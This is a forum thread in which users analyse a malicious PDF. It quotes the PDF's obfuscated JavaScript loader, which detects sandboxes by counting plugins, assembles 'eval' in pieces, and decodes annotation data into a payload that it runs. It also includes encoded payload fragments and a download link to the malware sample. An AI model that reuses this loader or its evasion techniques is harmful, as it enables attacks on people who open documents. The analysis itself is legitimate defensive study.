Results 1 to 2 of 2

Thread: Help analyzing a malicious PDF

  1. #1

    Help analyzing a malicious PDF

    1. Neither Annot in object 5 or 7 have a "-" in them so how does "var arr = sum.split(/-/);" create an array?
    2. What does "app[fnc]/**/(buf);" do?
    3. What is the point of checking how many browser plugins there are?

    JS from object 9
    Code:
    var pr = null;
    var fnc = 'ev';
    var sum = '';
    
    app.doc.syncAnnotScan();
    
    if (app.plugIns.length != 0) {
    	var num = 1;
    	pr = app.doc.getAnnots(
    
    		{
    			nPage: 0
    		}
    
    	);
    
    	sum = pr[num].subject;
    }
    
    var buf = "";
    
    if (app.plugIns.length > 3) {
    	fnc += 'a';
    	var arr = sum.split(/-/);
    
    	for (var i = 1; i < arr.length; i++) {
    		buf += String.fromCharCode("0x"+arr[i]);
    	}
    	fnc += 'l';
    }
    
    if (app.plugIns.length >= 2)
    {
    	app[fnc]/**/(buf);
    }

    Part of the encoded data from object 5
    Code:
    a5q311k7p350g164m0t241n1e6g6d232q4r241004276i2j4q6f3i2q2l6j7j2h494u5g1l6t780946777e8048276m3q43360836726c68283b6l7f7q4o5l7e1h7g32715l312h7p6p3r8383431227191n435l2j2e5i1l230a2b5u123s7a3p3h045o371t6d3n3q3b6s61193o7a6f5t4j3o58311r7h875l64460s2n4j876d134c3u1925763u1d33432n5f563r50864n647h845p5e7j0h2k677m0t2h1s6o31085j2q0j065g2718553c472c5062181k6d7o723f441n1a206f6m4d304718144o6639055b2m7f3161381q3m5t4a6h6k6756237d4u7s0n464r7l66264r5h0g1f68651n0l5d5k7e03742n2q087h371b25620i0f5i5r5k3c3f2j0i454j746l3u4m0u5d3i6u2l6c3f7a81414r2s7d045g5t5n426e3i1s07610u1l4p6q2d6p3q6u3t1c305352155s5f4t5n7d5d6k2n7r052g3g096f2p1g6k0a132s3307022r306p5d30437t5q3b1g1869527s0o4c1b167h7a404n2h436p1u226e2s012k3h4o395k347c4h374i656g3g617k7l4i7o6951257t5q22266c621n5r61791g2m5s72874d3i040g75336s303b0r045e356f0l3n270e1e5e4d6t3i4i6g680r7729680p865a49473379152359395u3336786i440d643d2d006m362u7781556n6j010g525g7p0u361a0h1e0g3q0r2j3h117i4o5c4g1r3p1m1m284u65851s3u6p7b0a822d802s6e5u3n1f2j6u072r512a5a1n0m5d6m2j62742u3k1b4t1a2j560j4q64460q7241846q0p558575814q1o75793e1r5r4c430q7u50


    Part of the encoded data from object 7
    Code:
    z00z6az00z33z00z68z00z31z00z31z00z37z00z69z00z34z00z6fz00z35z00z63z00z34z00z67z00z31z00z72z00z33z00z70z00z31z00z6dz00z31z00z6dz00z32z00z38z00z34z00z75z00z36z00z35z00z38z00z35z00z31z00z73z00z33z00z75z00z36z00z70z00z37z00z62z00z30z00z61z00z38z00z32z00z32z00z64z00z38z00z30z00z32z00z73z00z36z00z65z00z35z00z75z00z33z00z6ez00z31z00z66z00z32z00z6az00z36z00z75z00z30z00z37z00z32z00z72z00z35z00z31z00z32z00z61z00z35z00z61z00z31z00z6ez00z30z00z6dz00z35z00z64z00z36z00z6dz00z32z00z6az00z36z00z32z00z37z00z34z00z32z00z75z00z33z00z6bz00z31z00z62z00z34z00z74z00z31z00z61z00z32z00z6az00z35z00z36z00z30z00z6az00z34z00z71z00z36z00z34z00z34z00z36z00z30z00z71z00z37z00z32z00z34z00z31z00z38z00z34z00z36z00z71z00z30z00z70z00z35z00z35z00z38z00z35z00z37z00z35z00z38z00z31z00z34z00z71z00z31z00z6fz00z37z00z35z00z37z00z39z00z33z00z65z00z31z00z72z00z35z00z72z00z34z00z63z00z34z00z33z00z30z00z71z00z37z00z75z00z35z00z30z00z22z00z29z00z3bz00z0dz00z0az00z0dz00z0az00z0dz00z0a

    MALWARE/BIOHAZARD
    http://www.megaupload.com/?d=5F52NSCW

  2. #2
    I am new to examining this stuff, but it looks like a good one to look at. Thanks for the download. It looks like you are to the point were you have to start doing a couple things.

    Q.What is the point of checking how many browser plugins there are?

    A. If you notice that the browser checks are looking for a amount of plugins(which must return a number) greater than the number in each if statement.

    In this case it could be that they are using this to identify if the script is running on a user machine that may have plugins or a emulation environment that might not have any sort of plugins. My thought is these can be removed or you could say If ( 3 > 2) { code }.

    Trying to see it from an attacker perspective. If I want to try an identify the environment that my payload is running in maybe I can check pllugins to see if there are any there. If not the script is not going to run, but in most cases there will be for a users machine so lets let it run.

    Q. What does "app[fnc]/**/(buf);" do?

    var fnc = 'ev';
    fnc += 'a';
    fnc += 'l';

    var fnc = 'eval' --> this is probably broken up in order to evade signature detection by automated scanner.
    app.doc ----> app seems to be the object used throughout this code "that I am not sure of" Also maybe this means that we need values form the plugins, but I don't think so.

    Where I am at on this currently -----> I actually ran into errors trying to get the code to execute with spider monkey because of app.doc errors. After adding these objects in then my issue is now 'pr' not having a value.

    Q. Neither Annot in object 5 or 7 have a "-" in them so how does "var arr = sum.split(/-/);" create an array?

    I think the final result of this code is to convert unicode into characters from the result of element1 = (0x + "object 5 (2 characters)"); element2 = For each "z" replace with element1.

    Of course that is just a all just a theory not really any proof until I get the shellcode to output. Once that is the case can frame it up and start debugging it and seeing what is next.

Similar Threads

  1. Need help analyzing injected code
    By Sunk in forum Malware Analysis and Unpacking Forum
    Replies: 4
    Last Post: July 30th, 2012, 11:21
  2. malicious HID
    By dion in forum Off Topic
    Replies: 2
    Last Post: June 30th, 2011, 05:26
  3. analyzing spam..constructed for a purpose.
    By BanMe in forum The Newbie Forum
    Replies: 4
    Last Post: January 23rd, 2011, 20:43
  4. Shellcode analyzing
    By bobby in forum Malware Analysis and Unpacking Forum
    Replies: 6
    Last Post: October 1st, 2008, 10:44
  5. Redundant Checking & malicious consequences
    By dzzie in forum Malware Analysis and Unpacking Forum
    Replies: 4
    Last Post: August 27th, 2001, 22:15

Tags for this Thread

Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •